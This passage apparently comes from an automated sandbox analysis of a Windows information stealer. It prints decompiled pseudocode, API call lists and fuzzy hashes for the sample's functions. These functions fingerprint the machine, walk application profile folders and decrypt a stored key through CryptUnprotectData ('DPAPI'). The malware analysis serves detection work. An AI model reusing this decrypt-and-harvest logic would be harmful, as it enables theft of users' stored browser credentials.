0x0040918d
0x00409195
0x004091a4
0x004091bf

APIs

Part of subcall function 0040A350: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,00000000,00000004,?,004090E6,?,0000001C,?,00000104), ref: 0040A374

lstrcat.KERNEL32(?,00000000), ref: 004090F4
lstrcat.KERNEL32(?,?), ref: 00409119
lstrcat.KERNEL32(?,00BBBE10), ref: 0040912D

Part of subcall function 0040A6C0: GetFileAttributesA.KERNEL32(?,?,?,0040913F,?), ref: 0040A6CA

Part of subcall function 00406450: StrStrA.SHLWAPI(00000000,00BBBB40), ref: 004064A3

Strings

T@, xrefs: 00409171, 00409195, 00409174, 00409198

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$AttributesFileFolderPath
String ID: T@
API String ID: 4178457443-1862747698
Opcode ID: d78a7b79cf255fbf7ec2b9209a1d339a71d4579c04543eba2e60744e88ba7dbd
Instruction ID: 49df1d878341503ede1b95a877727c67d9a7cc0b2f9051fe47f8840a8edc0671
Opcode Fuzzy Hash: d78a7b79cf255fbf7ec2b9209a1d339a71d4579c04543eba2e60744e88ba7dbd
Instruction Fuzzy Hash: 7A3184B6D0020CBBCB14EBD0DC86EDE777CAB58304F0445ADB615A7181EA75A798CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409DF0, Relevance: 6.0, APIs: 4, Instructions: 30
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00409DF0() {
				struct tagHW_PROFILE_INFOA _v132;
				void* _v136;
				int _t8;

				_t8 = GetCurrentHwProfileA( &_v132); // executed
				if(_t8 == 0) {
					return 0x416b68;
				}
				_v136 = RtlAllocateHeap(GetProcessHeap(), 0, 0x64);
				E0040A230(_v136, _v136, 0, 4);
				 *0x4179f8(_v136,  &(_v132.szHwProfileGuid));
				return _v136;
			}

0x00409dfd
0x00409e05
0x00000000
0x00409e49
0x00409e18
0x00409e29
0x00409e39
0x00000000

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 00409DFD
GetProcessHeap.KERNEL32(00000000,00000064), ref: 00409E0B
RtlAllocateHeap.NTDLL(00000000), ref: 00409E12
lstrcat.KERNEL32(?,?), ref: 00409E39

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$AllocateCurrentProcessProfilelstrcat
String ID:
API String ID: 3231071835-0
Opcode ID: 8948acc3285f7b9d82f6d4ef68d63fd08e89676f4b8d2baacb183f411d8db8b4
Instruction ID: e51642f83de363521475889fc13478dfa07b47a56b9fb7a38221f52731105826
Opcode Fuzzy Hash: 8948acc3285f7b9d82f6d4ef68d63fd08e89676f4b8d2baacb183f411d8db8b4
Instruction Fuzzy Hash: 64F082B1A483199BDB20EBA4DC09F9E7778BB04700F0081A9F705E72C1DA359D448F69

Uniqueness

Uniqueness Score: -1.00%

Function 004057C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057C0() {
				CHAR* _t1;

				_t1 =  *0x417124; // 0x413050
				CreateMutexA(0, 0, _t1); // executed
				if(GetLastError() != 0xb7) {
					return 1;
				}
				return 0;
			}

0x004057c3
0x004057cd
0x004057de
0x00000000
0x004057e4
0x00000000

APIs

CreateMutexA.KERNEL32(00000000,00000000,00413050,?,0040581D), ref: 004057CD
GetLastError.KERNEL32(?,0040581D), ref: 004057D3

Strings

P0A, xrefs: 004057C3

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CreateErrorLastMutex
String ID: P0A
API String ID: 1925916568-1298182231
Opcode ID: 29c54ad258cd76e37abceea7bb2a3236fe11b2e71b517aa4f2cde0900dcaf7ea
Instruction ID: c283527a0eb27d5600a3bc26d0b75b8be6dc95cb6e4bf237b4227d89d0571620
Opcode Fuzzy Hash: 29c54ad258cd76e37abceea7bb2a3236fe11b2e71b517aa4f2cde0900dcaf7ea
Instruction Fuzzy Hash: 1AD0C9712A9304EBE6501798AC45B6673A8E708701F504432F609DA2D0D664BC409A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00409390, Relevance: 4.8, APIs: 3, Instructions: 294
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00409390(void* __eflags, intOrPtr _a4) {
				void* _t36;
				void* _t105;
				void* _t106;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				intOrPtr _t131;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t134;
				intOrPtr _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				intOrPtr _t138;
				intOrPtr _t139;
				intOrPtr _t140;
				intOrPtr _t141;
				intOrPtr _t142;
				intOrPtr _t143;
				intOrPtr _t144;
				void* _t145;
				intOrPtr _t146;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr _t149;
				intOrPtr _t150;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t156;
				intOrPtr _t157;
				intOrPtr _t158;
				intOrPtr _t159;
				intOrPtr _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t163;
				intOrPtr _t164;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t167;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t170;
				intOrPtr _t171;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t174;
				intOrPtr _t175;
				intOrPtr _t176;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr _t179;
				void* _t215;

				_t215 = __eflags;
				_t36 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f); // executed
				 *0x417828 = _t36; // executed
				E00405E20(); // executed
				 *0x41782c = 0;
				_t112 =  *0x41728c; // 0xbb2d80
				_t146 =  *0x41724c; // 0xbae598
				E004090B0(_t112, _t215, _t146, _t112, _a4); // executed
				_t113 =  *0x4171dc; // 0xbbbe40
				_t147 =  *0x417790; // 0xbb96b0
				E004090B0(_t113, _t215, _t147, _t113, _a4); // executed
				_t114 =  *0x417740; // 0xbbbe58
				_t148 =  *0x41709c; // 0xbae610
				E004090B0(_t114, _t215, _t148, _t114, _a4); // executed
				_t115 =  *0x417278; // 0xbb2d90
				_t149 =  *0x4177bc; // 0xbb9330
				E004090B0(_t115, _t215, _t149, _t115, _a4); // executed
				_t116 =  *0x417518; // 0xbc4640
				_t150 =  *0x417628; // 0xbb9450
				E004090B0(_t116, _t215, _t150, _t116, _a4); // executed
				_t117 =  *0x417428; // 0xbc4510
				_t151 =  *0x4177c8; // 0xbb9370
				E004090B0(_t117, _t215, _t151, _t117, _a4); // executed
				_t118 =  *0x4175bc; // 0xbc4520
				_t152 =  *0x41738c; // 0xbb9350
				E004090B0(_t118, _t215, _t152, _t118, _a4); // executed
				_t119 =  *0x417474; // 0xbc4530
				_t153 =  *0x417068; // 0xbae818
				E004090B0(_t119, _t215, _t153, _t119, _a4); // executed
				_t120 =  *0x417248; // 0xbbbe88
				_t154 =  *0x417168; // 0xbb9390
				E004090B0(_t120, _t215, _t154, _t120, _a4); // executed
				_t121 =  *0x4173dc; // 0xbbbea0
				_t155 =  *0x4171d4; // 0xbbbde0
				E004090B0(_t121, _t215, _t155, _t121, _a4); // executed
				_t122 =  *0x417028; // 0xbc46a0
				_t156 =  *0x4175d0; // 0xbb93b0
				E004090B0(_t122, _t215, _t156, _t122, _a4); // executed
				_t123 =  *0x417604; // 0xbc45f0
				_t157 =  *0x417728; // 0xbae7f0
				E004090B0(_t123, _t215, _t157, _t123, _a4); // executed
				_t124 =  *0x417440; // 0xbc45c0
				_t158 =  *0x417334; // 0xbb93d0
				E004090B0(_t124, _t215, _t158, _t124, _a4); // executed
				_t125 =  *0x417094; // 0xbc4560
				_t159 =  *0x417300; // 0xbae728
				E004090B0(_t125, _t215, _t159, _t125, _a4); // executed
				_t126 =  *0x41743c; // 0xbc4650
				_t160 =  *0x417580; // 0xbae5c0
				E004090B0(_t126, _t215, _t160, _t126, _a4); // executed
				_t127 =  *0x417544; // 0xbc4540
				_t161 =  *0x417754; // 0xbb93f0
				E004090B0(_t127, _t215, _t161, _t127, _a4); // executed
				_t128 =  *0x4176d0; // 0xbc46b0
				_t162 =  *0x4176a4; // 0xbb94b0
				E004090B0(_t128, _t215, _t162, _t128, _a4); // executed
				_t129 =  *0x417100; // 0xbbbdf8
				_t163 =  *0x417078; // 0xbae688
				E004090B0(_t129, _t215, _t163, _t129, _a4); // executed
				_t130 =  *0x4176f8; // 0xbc45a0
				_t164 =  *0x4175b8; // 0xbc8c90
				E004090B0(_t130, _t215, _t164, _t130, _a4); // executed
				_t131 =  *0x417114; // 0xbc8c78
				_t165 =  *0x417624; // 0xbae660
				E004090B0(_t131, _t215, _t165, _t131, _a4); // executed
				_t132 =  *0x4173e4; // 0xbc4610
				_t166 =  *0x417410; // 0xbc0280
				E004090B0(_t132, _t215, _t166, _t132, _a4); // executed
				_t133 =  *0x417394; // 0xbc44c0
				_t167 =  *0x417024; // 0xbae638
				E004091C0(_t133, _t215, _t167, _t133, _a4); // executed
				_t134 =  *0x4173b8; // 0xbc45b0
				_t168 =  *0x4172c4; // 0xbc0100
				E004091C0(_t134, _t215, _t168, _t134, _a4); // executed
				_t135 =  *0x4175b4; // 0xbc8c30
				_t169 =  *0x41731c; // 0xbc01f0
				E004090B0(_t135, _t215, _t169, _t135, _a4); // executed
				_t136 =  *0x41734c; // 0xbc4550
				_t170 =  *0x4170c4; // 0xbae778
				E004092C0(_t136, _t215, _t170, _t136, _a4); // executed
				_t137 =  *0x4172e8; // 0xbc8bd0
				_t171 =  *0x417610; // 0xbae7a0
				E004092C0(_t137, _t215, _t171, _t137, _a4); // executed
				_t138 =  *0x417020; // 0xbc8be8
				_t172 =  *0x4176f4; // 0xbab358
				E004092C0(_t138, _t215, _t172, _t138, _a4); // executed
				_t139 =  *0x4173cc; // 0xbc8c60
				_t173 =  *0x417224; // 0xbb9410
				E004092C0(_t139, _t215, _t173, _t139, _a4); // executed
				_t140 =  *0x417298; // 0xbc8c00
				_t174 =  *0x4177d0; // 0xbc0070
				E004092C0(_t140, _t215, _t174, _t140, _a4); // executed
				_t141 =  *0x417574; // 0xbc8c18
				_t175 =  *0x417348; // 0xbab4a8
				E004092C0(_t141, _t215, _t175, _t141, _a4); // executed
				_t142 =  *0x417060; // 0xbc4620
				_t176 =  *0x4170d0; // 0xbc8df0
				E004092C0(_t142, _t215, _t176, _t142, _a4); // executed
				_t143 =  *0x4171ec; // 0xbc4570
				_t177 =  *0x4176cc; // 0xbc8c48
				E004092C0(_t143, _t215, _t177, _t143, _a4); // executed
				_t144 =  *0x41721c; // 0xbc8a50
				_t178 =  *0x41747c; // 0xbb94f0
				E004092C0(_t144, _t215, _t178, _t144, _a4); // executed
				E00405840(_t215);
				_t105 =  *0x417828; // 0x0
				_t106 =  *0x4178e4(_t105);
				_t145 =  *0x417828; // 0x0
				_t179 =  *0x417650; // 0xbc8b70
				E00412380(_a4, _t179, _t145, _t106);
				E0040A270(0x417828, 4); // executed
				E00405F10(); // executed
				return E00405F30();
			}

0x00409390
0x004093a1
0x004093a7
0x004093ac
0x004093b1
0x004093bf
0x004093c6
0x004093cd
0x004093d9
0x004093e0
0x004093e7
0x004093f3
0x004093fa
0x00409401
0x0040940d
0x00409414
0x0040941b
0x00409427
0x0040942e
0x00409435
0x00409441
0x00409448
0x0040944f
0x0040945b
0x00409462
0x00409469
0x00409475
0x0040947c
0x00409483
0x0040948f
0x00409496
0x0040949d
0x004094a9
0x004094b0
0x004094b7
0x004094c3
0x004094ca
0x004094d1
0x004094dd
0x004094e4
0x004094eb
0x004094f7
0x004094fe
0x00409505
0x00409511
0x00409518
0x0040951f
0x0040952b
0x00409532
0x00409539
0x00409545
0x0040954c
0x00409553
0x0040955f
0x00409566
0x0040956d
0x00409579
0x00409580
0x00409587
0x00409593
0x0040959a
0x004095a1
0x004095ad
0x004095b4
0x004095bb
0x004095c7
0x004095ce
0x004095d5
0x004095e1
0x004095e8
0x004095ef
0x004095fb
0x00409602
0x00409609
0x00409615
0x0040961c
0x00409623
0x0040962f
0x00409636
0x0040963d
0x00409649
0x00409650
0x00409657
0x00409663
0x0040966a
0x00409671
0x0040967d
0x00409684
0x0040968b
0x00409697
0x0040969e
0x004096a5
0x004096b1
0x004096b8
0x004096bf
0x004096cb
0x004096d2
0x004096d9
0x004096e5
0x004096ec
0x004096f3
0x004096ff
0x00409706
0x0040970d
0x00409715
0x0040971a
0x00409720
0x00409727
0x0040972e
0x00409739
0x00409748
0x0040974d
0x00409758

APIs

GetProcessHeap.KERNEL32(00000000,000F423F,?,00405420,?,?,00000104), ref: 0040939A
RtlAllocateHeap.NTDLL(00000000,?,00405420), ref: 004093A1

Part of subcall function 00405E20: LoadLibraryA.KERNEL32(00BA4E90,?,004093B1,?,00405420,?,?,00000104), ref: 00405E29
Part of subcall function 00405E20: GetProcAddress.KERNEL32(60900000,00BBBCF0), ref: 00405E4F
Part of subcall function 00405E20: GetProcAddress.KERNEL32(60900000,00BB9310), ref: 00405E67
Part of subcall function 00405E20: GetProcAddress.KERNEL32(60900000,00BBBD38), ref: 00405E7F
Part of subcall function 00405E20: GetProcAddress.KERNEL32(60900000,00BB92D0), ref: 00405E98
Part of subcall function 00405E20: GetProcAddress.KERNEL32(60900000,00BB9510), ref: 00405EB0
Part of subcall function 00405E20: GetProcAddress.KERNEL32(60900000,00BBBC48), ref: 00405EC8
Part of subcall function 00405E20: GetProcAddress.KERNEL32(60900000,00BB95D0), ref: 00405EE1
Part of subcall function 00405E20: GetProcAddress.KERNEL32(60900000,00BB95F0), ref: 00405EF9

Part of subcall function 004090B0: lstrcat.KERNEL32(?,00000000), ref: 004090F4
Part of subcall function 004090B0: lstrcat.KERNEL32(?,?), ref: 00409119
Part of subcall function 004090B0: lstrcat.KERNEL32(?,00BBBE10), ref: 0040912D

Part of subcall function 004091C0: lstrcat.KERNEL32(?,00000000), ref: 00409204
Part of subcall function 004091C0: lstrcat.KERNEL32(?,?), ref: 00409229
Part of subcall function 004091C0: lstrcat.KERNEL32(?,00BBBE10), ref: 0040923D

Part of subcall function 004092C0: lstrcat.KERNEL32(?,00BC4550), ref: 00409307
Part of subcall function 004092C0: lstrcat.KERNEL32(?,?), ref: 0040931B
Part of subcall function 004092C0: lstrcat.KERNEL32(?,00BBBE28), ref: 0040932F

Part of subcall function 00405840: memset.MSVCRT ref: 00405863
Part of subcall function 00405840: GetVersionExA.KERNEL32(00000094,00000000,00000094), ref: 0040588D
Part of subcall function 00405840: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 004059B8
Part of subcall function 00405840: lstrlen.KERNEL32(?), ref: 004059C5

lstrlen.KERNEL32(00000000), ref: 00409720

Part of subcall function 00405F10: FreeLibrary.KERNEL32(60900000,?,00409752,00417828,00000004), ref: 00405F19

Part of subcall function 00405F30: FreeLibrary.KERNEL32(00000000,?,00409757,00417828,00000004), ref: 00405F39

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$AddressProc$Library$FreeHeaplstrlen$AllocateByteCharLoadMultiProcessVersionWidememset
String ID:
API String ID: 2863731722-0
Opcode ID: 2c0a37a90f7dc3242d042862279c5858b54baf4073f980552cb8864b4bc64ed2
Instruction ID: 5aeaaf6f9e355a57a19b2a447464357da25c3f134d1334a76938664e444d9c71
Opcode Fuzzy Hash: 2c0a37a90f7dc3242d042862279c5858b54baf4073f980552cb8864b4bc64ed2
Instruction Fuzzy Hash: 36A1DBBA658104BBC704EB98FC81DD737B9A78C344B04C57DFA0C87256E635A940DBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00406450, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00406450(CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				char* _v8;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t32;
				char* _t35;
				void* _t45;
				char* _t57;
				intOrPtr _t58;

				_v44 = 0;
				_t32 = E00406140(_a4,  &_v40,  &_v16); // executed
				if(_t32 != 0) {
					_t35 = E0040A650(_v40, _v16); // executed
					_v8 = _t35;
					if(_v8 != 0) {
						_t57 =  *0x417088; // 0xbbbb40
						_v20 = StrStrA(_v8, _t57);
						if(_v20 != 0) {
							_v20 = _v20 + 0x10;
							_t58 =  *0x417390; // 0xbb2e60
							_v48 = E0040A570(_v20, _t58);
							if(E00406230( &_v24, _v48,  &_v32,  &_v24) != 0 && _v24 >= 5) {
								asm("repe cmpsb");
								if(0 == 0) {
									_t45 = E004062D0(_v32 + 5, _v24 - 5,  &_v28,  &_v12); // executed
									if(_t45 != 0 && _v12 == 0x20) {
										_v44 = 1;
										E004063A0(_v28, _a8, _a12); // executed
									}
								}
							}
						}
					}
				}
				return _v44;
			}

0x00406458
0x0040646b
0x00406475
0x00406483
0x0040648b
0x00406492
0x00406498
0x004064a9
0x004064b0
0x004064bc
0x004064bf
0x004064d2
0x004064eb
0x00406502
0x00406504
0x0040651c
0x00406526
0x0040652e
0x00406541
0x00406546
0x00406526
0x00406504
0x004064eb
0x004064b0
0x00406492
0x00406551

APIs

Part of subcall function 00406140: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00406470,00000000,?), ref: 00406167
Part of subcall function 00406140: GetFileSizeEx.KERNEL32(000000FF,pd@,?,00406470,00000000,?), ref: 0040618C
Part of subcall function 00406140: LocalAlloc.KERNEL32(00000040,?,?,00406470), ref: 004061AC
Part of subcall function 00406140: ReadFile.KERNEL32(000000FF,?,000000FF,?,00000000,?,00406470), ref: 004061D5
Part of subcall function 00406140: LocalFree.KERNEL32(?), ref: 0040620B
Part of subcall function 00406140: FindCloseChangeNotification.KERNEL32(000000FF,?,00406470,00000000,?), ref: 00406215

Part of subcall function 0040A650: LocalAlloc.KERNEL32(00000040,-00000001), ref: 0040A672

StrStrA.SHLWAPI(00000000,00BBBB40), ref: 004064A3

Part of subcall function 00406230: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,d@,00000000,00000000), ref: 0040625F
Part of subcall function 00406230: LocalAlloc.KERNEL32(00000040,?,?,004064E6,?,?), ref: 00406271
Part of subcall function 00406230: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,d@,00000000,00000000), ref: 0040629A
Part of subcall function 00406230: LocalFree.KERNEL32(?,?,?,004064E6,?,?), ref: 004062AF

Part of subcall function 004062D0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062F4
Part of subcall function 004062D0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00406313
Part of subcall function 004062D0: LocalFree.KERNEL32(?), ref: 0040633F

Strings

, xrefs: 00406528
DPAPI, xrefs: 004064F8

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotect
String ID: $DPAPI
API String ID: 319386116-1819349886
Opcode ID: c87170166a2aada9872acd1a379c4ca7763c893d6f43633f6ee52792c90479a5
Instruction ID: 8c224651c0f1addd4240f2aed63a7362a0e9c58ede714f8561195b316be0224d
Opcode Fuzzy Hash: c87170166a2aada9872acd1a379c4ca7763c893d6f43633f6ee52792c90479a5
Instruction Fuzzy Hash: B1314472D00118ABCB04DBD9EC45AEFB7B8AB48304F05456EF905B7285E7349954CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004121E0, Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004121E0(void* __ecx, signed int _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _t29;
				intOrPtr _t31;

				_t29 = E0040A0E0(__ecx, 0x4098); // executed
				_v16 = _t29;
				if(_v16 == 0) {
					_v32 = 0;
				} else {
					_v32 = E00410510(_v16, _a16);
				}
				_v8 = _v32;
				_t43 = _v8;
				_t31 = E004106D0(_v8, _a4, _a8, _a12); // executed
				 *0x417c30 = _t31;
				if( *0x417c30 == 0) {
					_v28 = E0040A0E0(_t43, 8);
					_v12 = _v28;
					 *_v12 = 2;
					 *((intOrPtr*)(_v12 + 4)) = _v8;
					return _v12;
				} else {
					_v24 = _v8;
					_v20 = _v24;
					if(_v20 == 0) {
						_v36 = 0;
					} else {
						_v36 = E004122A0(_v20, 1);
					}
					return 0;
				}
			}

0x004121eb
0x004121f3
0x004121fa
0x0041220d
0x004121fc
0x00412208
0x00412208
0x00412217
0x00412226
0x00412229
0x0041222e
0x0041223a
0x00412272
0x00412278
0x0041227e
0x0041228a
0x00000000
0x0041223c
0x0041223f
0x00412245
0x0041224c
0x0041225d
0x0041224e
0x00412258
0x00412258
0x00000000
0x00412264

APIs

new[].LIBCMTD ref: 004121EB
codecvt.LIBCPMTD ref: 00412253

Part of subcall function 00410510: new[].LIBCMTD ref: 004105E4

new[].LIBCMTD ref: 0041226A

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: new[]$codecvt
String ID:
API String ID: 1685477457-0
Opcode ID: 81faf1e3f81aedd124bbe9d7a1cdf64596cf3db86d99609903b408f3da13abb2
Instruction ID: daca0ebb4e2a8a763117dc052d8b87f2de912ac2ddf0d8d514f6ccd26e4ec42c
Opcode Fuzzy Hash: 81faf1e3f81aedd124bbe9d7a1cdf64596cf3db86d99609903b408f3da13abb2
Instruction Fuzzy Hash: 062129B5D0020DEFCB04DF94D945BEEB7B1BB48304F1081AAE815A7380D7B85A90CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00409760, Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409760() {
				void* _v8;
				long _v12;
				int _t9;

				_v8 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_v12 = 0x104;
				_t9 = GetComputerNameA(_v8,  &_v12); // executed
				if(_t9 != 0) {
					return _v8;
				}
				return 0x416b68;
			}

0x0040977a
0x0040977d
0x0040978c
0x00409794
0x00000000
0x0040979f
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040976D
RtlAllocateHeap.NTDLL(00000000), ref: 00409774
GetComputerNameA.KERNEL32(?,00000104), ref: 0040978C

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 79d30bc9ea12d69f2198c3b4372374eb37d01cc5ffdfcfe208871ee7295995af
Instruction ID: 6ddfea779b23d4ae22b6fce6103fa0701612e436f042a72c9e3d20d5fbc47992
Opcode Fuzzy Hash: 79d30bc9ea12d69f2198c3b4372374eb37d01cc5ffdfcfe208871ee7295995af
Instruction Fuzzy Hash: C6E0D8F5954308EBDB00EFE4DD48ECD7BB8EB04301F1040A6E905E7280D7749E448755

Uniqueness

Uniqueness Score: -1.00%

Function 004091C0, Relevance: 3.8, APIs: 3, Instructions: 77
stringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E004091C0(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				char _v12;
				char _v276;
				char _v540;
				void* _t34;
				void* _t41;
				intOrPtr _t46;
				void* _t58;
				void* _t60;

				_v12 = 0;
				_v8 = 0;
				E0040A270( &_v276, 0x104);
				E0040A350( &_v276,  &_v276, 0x1a); // executed
				 *0x4179f8( &_v276, _a4);
				E0040A270( &_v540, 0x104);
				 *0x4179f8( &_v540,  &_v276);
				_t46 =  *0x41773c; // 0xbbbe10
				 *0x4179f8( &_v540, _t46);
				_t34 = E0040A6C0( &_v540); // executed
				_t60 = _t58 + 0xc;
				if(_t34 != 0) {
					_t41 = E00406450( &_v540,  &_v12,  &_v8);
					_t60 = _t60 + 0xc;
					if(_t41 == 0) {
						E00406350( &_v12,  &_v8);
						_t60 = _t60 + 8;
					}
				}
				E00407560(0x413042,  &_v276, _a8, _v12, _v8, _a12); // executed
				return E00406350( &_v12,  &_v8);
			}

0x004091c9
0x004091d0
0x004091e3
0x004091f1
0x00409204
0x00409216
0x00409229
0x0040922f
0x0040923d
0x0040924a
0x0040924f
0x00409254
0x00409265
0x0040926a
0x0040926f
0x00409279
0x0040927e
0x0040927e
0x0040926f
0x0040929d
0x004092b8

APIs

Part of subcall function 0040A350: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,00000000,00000004,?,004090E6,?,0000001C,?,00000104), ref: 0040A374

lstrcat.KERNEL32(?,00000000), ref: 00409204
lstrcat.KERNEL32(?,?), ref: 00409229
lstrcat.KERNEL32(?,00BBBE10), ref: 0040923D

Part of subcall function 0040A6C0: GetFileAttributesA.KERNEL32(?,?,?,0040913F,?), ref: 0040A6CA

Part of subcall function 00406450: StrStrA.SHLWAPI(00000000,00BBBB40), ref: 004064A3

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$AttributesFileFolderPath
String ID:
API String ID: 4178457443-0
Opcode ID: a71a3bb4b854c84deccc7e6f1708c3a2ff6a1ae46ba89b43cf13ee2406c77cb9
Instruction ID: d1eada0511cefdf09af70d1e6ab22775d8b6fbeb1e4e5cff4e5cc3f83e5140a4
Opcode Fuzzy Hash: a71a3bb4b854c84deccc7e6f1708c3a2ff6a1ae46ba89b43cf13ee2406c77cb9
Instruction Fuzzy Hash: 112156B6C0020CBBCB14EBD0DC85EDE777CAB58304F0445ADF61567181E775A7988BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004092C0, Relevance: 3.8, APIs: 3, Instructions: 57
stringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E004092C0(void* __ecx, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12) {
				char _v268;
				char _v532;
				void* _t23;
				intOrPtr _t31;
				intOrPtr _t33;
				void* _t38;
				void* _t40;

				E0040A270( &_v532, 0x104);
				E0040A270( &_v268, 0x104);
				E0040A350( &_v268,  &_v532, 0x1a); // executed
				 *0x4179f8( &_v532, _a4);
				 *0x4179f8( &_v268,  &_v532);
				_t31 =  *0x417210; // 0xbbbe28
				 *0x4179f8( &_v268, _t31);
				_t23 = E0040A6C0( &_v268); // executed
				_t40 = _t38 + 0xc;
				if(_t23 != 0) {
					if( *0x41782c == 0) {
						E004044A0(_t31);
						 *0x41782c = 1;
						_t33 =  *0x417698; // 0xbbbe70
						E004066C0(_t33);
						_t40 = _t40 + 4;
					}
					return E00408410(0x413042,  &_v532, _a8, _a12);
				}
				return _t23;
			}

0x004092d5
0x004092e6
0x004092f4
0x00409307
0x0040931b
0x00409321
0x0040932f
0x0040933c
0x00409341
0x00409346
0x0040934f
0x00409351
0x00409356
0x00409360
0x00409367
0x0040936c
0x0040936c
0x00000000
0x00409388
0x0040938e

APIs

Part of subcall function 0040A350: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,00000000,00000004,?,004090E6,?,0000001C,?,00000104), ref: 0040A374

lstrcat.KERNEL32(?,00BC4550), ref: 00409307
lstrcat.KERNEL32(?,?), ref: 0040931B
lstrcat.KERNEL32(?,00BBBE28), ref: 0040932F

Part of subcall function 0040A6C0: GetFileAttributesA.KERNEL32(?,?,?,0040913F,?), ref: 0040A6CA

Part of subcall function 004044A0: lstrcat.KERNEL32(?,00BA5250), ref: 0040451C
Part of subcall function 004044A0: lstrcat.KERNEL32(?,00BAC128), ref: 00404530
Part of subcall function 004044A0: lstrcat.KERNEL32(?,00BA5070), ref: 00404544
Part of subcall function 004044A0: lstrcat.KERNEL32(?,00BA5250), ref: 00404557
Part of subcall function 004044A0: lstrcat.KERNEL32(?,00BAC128), ref: 0040456B
Part of subcall function 004044A0: lstrcat.KERNEL32(?,00BA50B8), ref: 0040457F
Part of subcall function 004044A0: lstrcat.KERNEL32(?,00BA5250), ref: 00404592
Part of subcall function 004044A0: lstrcat.KERNEL32(?,00BAC128), ref: 004045A6
Part of subcall function 004044A0: lstrcat.KERNEL32(?,00BA0508), ref: 004045BA
Part of subcall function 004044A0: lstrcat.KERNEL32(?,00BA5250), ref: 004045CD
Part of subcall function 004044A0: lstrcat.KERNEL32(?,00BAC128), ref: 004045E1
Part of subcall function 004044A0: lstrcat.KERNEL32(?,00BA0550), ref: 004045F5
Part of subcall function 004044A0: lstrcat.KERNEL32(?,00BA5250), ref: 00404608
